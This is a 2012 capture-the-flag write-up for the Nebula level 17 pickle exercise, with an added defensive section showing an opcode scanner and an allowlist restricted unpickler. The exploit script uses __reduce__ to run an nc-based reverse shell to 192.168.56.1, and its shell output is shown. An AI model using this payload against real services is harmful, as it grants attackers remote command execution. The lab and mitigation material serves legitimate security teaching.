Thursday, October 4, 2012

Exploit Exercise - Python Pickles

Level 17 in Nebula is fairly straightforward. A first look at the level's source reveals a call to Python's pickle.loads() on data received from the network. pickle is not a safe format for untrusted input: a pickled object can name any importable callable together with its arguments via __reduce__, and the unpickler invokes that callable while deserializing. Since the level simply unpickles whatever is sent to it, we can use this to execute a command and gain a remote shell. Details of the technique can be found in the paper "Sour Pickles" and at blog.nelhage.com.
#!/usr/bin/env python
# payload.py (Python 2, as run against the level)
import pickle
import socket
import os

class payload(object):
    # pickle calls __reduce__ when serialising; the (callable, args) tuple it
    # returns is what the level's pickle.loads() invokes on the server
    def __reduce__(self):
        comm = "rm /tmp/shell; mknod /tmp/shell p; nc 192.168.56.1 10008 0</tmp/shell | /bin/sh 1>/tmp/shell"
        return (os.system, (comm,))

data = pickle.dumps(payload())
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect(("192.168.56.2", 10007))
print soc.recv(1024)   # the level's banner
soc.send(data)
[root@renorobert 17]# python payload.py && nc -v -l 10008
Accepted connection from 192.168.56.1:56089
Connection from 192.168.56.2 port 10008 [tcp/octopus] accepted
id
uid=982(flag17) gid=982(flag17) groups=982(flag17)
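The defensive counterpart to what this level demonstrates, as an added example (Python 3) that is not part of the original post or of Nebula: a pickletools-based scanner that flags the opcodes able to resolve or call code without executing the stream, and a restricted Unpickler (the allowlist pattern from the Python documentation) that refuses any global outside a fixed set. The two sample pickles are constructed here; the hostile-shaped one names os.getcwd rather than a shell command, so it is harmless even if loaded.

```python
import io
import pickle
import pickletools

# Opcodes that let the unpickler look up or call code. If any of these appear
# in data from an untrusted source, it must not be handed to pickle.loads().
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL",              # resolve module.name to an object
    "REDUCE",                              # call callable(*args), as __reduce__ payloads do
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",  # instantiate classes
    "BUILD",                               # runs __setstate__ or sets __dict__
}


def scan_pickle(data):
    """Return the suspicious opcode names found in data, in stream order.

    pickletools.genops only parses the stream; nothing is imported or called.
    """
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in SUSPICIOUS_OPCODES]


# Allowlist of globals a restricted unpickler may resolve. Anything else
# (os.system, every other name in os or subprocess, builtins.eval, ...) is refused.
SAFE_GLOBALS = {
    "builtins": {"dict", "list", "set", "frozenset", "tuple", "str",
                 "bytes", "int", "float", "bool"},
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted globals."""

    def find_class(self, module, name):
        if name in SAFE_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def safe_loads(data):
    """Like pickle.loads, but routed through RestrictedUnpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_loads(data):
    """Return ('ok', obj) or ('rejected', reason) instead of raising."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


# Constructed sample inputs (not taken from the level):
# a protocol-0 pickle that calls os.getcwd() on load, i.e. the GLOBAL ... REDUCE
# shape a __reduce__ payload produces, but with a benign target
HOSTILE_SHAPE = b"cos\ngetcwd\n(tR."
# an ordinary data-only pickle of a dict
BENIGN_PICKLE = pickle.dumps({"user": "flag17", "level": 17})


if __name__ == "__main__":
    print("hostile-shaped:", scan_pickle(HOSTILE_SHAPE), try_safe_loads(HOSTILE_SHAPE))
    print("benign:", scan_pickle(BENIGN_PICKLE), try_safe_loads(BENIGN_PICKLE))
```

The scanner is useful for logging and alerting on a service that still has to accept pickles, while the restricted unpickler is the mitigation. Note that it is an allowlist, not a denylist: blocking os.system alone would still leave builtins.eval, subprocess, and similar reachable. The actual fix for a service like this level's is to stop unpickling network input altogether and use a data-only format such as JSON.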
